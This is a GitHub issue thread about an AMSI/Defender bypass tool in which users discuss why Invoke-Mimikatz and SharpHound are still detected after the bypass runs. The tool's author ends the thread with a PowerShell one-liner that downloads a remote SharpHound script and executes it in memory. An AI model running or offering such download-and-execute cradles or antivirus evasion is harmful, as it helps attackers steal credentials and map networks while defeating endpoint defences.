### ISSUE TITLE
Is this working?

### ISSUE THREAD

**Issue by jsdhasfedssad** [whydee86/SnD_AMSI#2]
Hi. When I try this on a machine updated today Invoke-Mimikatz.ps1 is detected by defender. This is of course after running your tool. Your tool also does not bypass the execution policy so I cannot run scripts using that regardless. Am I missing something?

**Comment by whydee86** [comment]
Can you please share with me exactly what did you try to execute?
I bypass defender but I think there is a problem with the mimikatz PowerShell script.
If "defender" is off, are you able to execute mimikatz script successfully(If yes I would like to know how)?
Because I tried PowerUp and It works.(as you can see below) 
![image](https://user-images.githubusercontent.com/43274863/154814940-7d7c937b-a90a-4ee1-bbc0-2507e78ef7d7.png)
![image](https://user-images.githubusercontent.com/43274863/154815087-ed62f7e2-26fc-4440-aa56-6b06bd7866a3.png)

**Comment by jsdhasfedssad** [comment]
Running Invoke-Mimikatz.ps1 works when Defender is disabled.

![working](https://user-images.githubusercontent.com/97032878/154931109-660ffea2-65c5-46e1-9a13-443a147696b8.png)

Running the same version of Invoke-Mimikatz.ps1 after executing your tool still fails. So does SharpHound.ps1 too.

![failing](https://user-images.githubusercontent.com/97032878/154931301-98d4f3ad-a486-4ac6-a9ee-11a3534d4ec4.png)

**Comment by whydee86** [comment]
Try this:
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/master/SharpHound.ps1')
![image](https://user-images.githubusercontent.com/43274863/155973238-59ce28b9-44f1-48e6-96e3-391e91fdccf7.png)
